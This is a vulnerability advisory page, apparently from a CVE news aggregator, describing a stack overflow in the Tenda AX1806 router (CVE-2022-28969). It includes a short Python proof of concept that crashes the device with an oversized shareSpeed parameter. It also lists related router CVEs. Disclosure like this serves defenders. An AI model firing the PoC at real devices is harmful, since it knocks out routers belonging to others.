Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28969: IoT-vuln/Tenda/AX1806/fromSetWifiGusetBasic at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the shareSpeed parameter in the function fromSetWifiGusetBasic. This vulnerability allows attackers to cause a Denial of Service (DoS).

CVE
#vulnerability#web#dos#wifi

Overview

  • The device’s official website: https://www.tenda.com.cn/product/AX1806.html
  • Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the fromSetWifiGusetBasic function, which can be accessed via the URL goform/WifiGuestSet.

The function takes the POST parameter shareSpeed, does not validate its length, and copies it directly to a local variable acStack1888 on the stack, causing a stack overflow.

PoC

Poc of Denial of Service(DoS)

import requests

data = { b"shareSpeed": b’A’*0x800 } res = requests.post("http://127.0.0.1/goform/WifiGuestSet", data=data) print(res.content)

debug result:

Related news

CVE-2022-28972: IoT-vuln/readme.md at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the timeZone parameter in the function form_fast_setting_wifi_set. This vulnerability allows attackers to cause a Denial of Service (DoS).

CVE-2022-28973: IoT-vuln/readme.md at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the wanMTU parameter in the function fromAdvSetMacMtuWan. This vulnerability allows attackers to cause a Denial of Service (DoS).

CVE-2022-28581: IOT_vuln/TOTOLink/A7100RU/9 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiAdvancedCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28582: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiSignalCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28583: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28584: IOT_vuln/TOTOLink/A7100RU/8 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsStart interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28575: IOT_vuln/TOTOLink/A7100RU/1 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setopenvpnclientcfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows attackers to execute arbitrary commands through a carefully constructed payload

CVE-2022-28578: IOT_vuln/TOTOLink/A7100RU/2 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setOpenVpnCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28577: IOT_vuln/TOTOLink/A7100RU/3 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the delParentalRules interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE-2022-28580: IOT_vuln/TOTOLink/A7100RU/5 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setL2tpServerCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907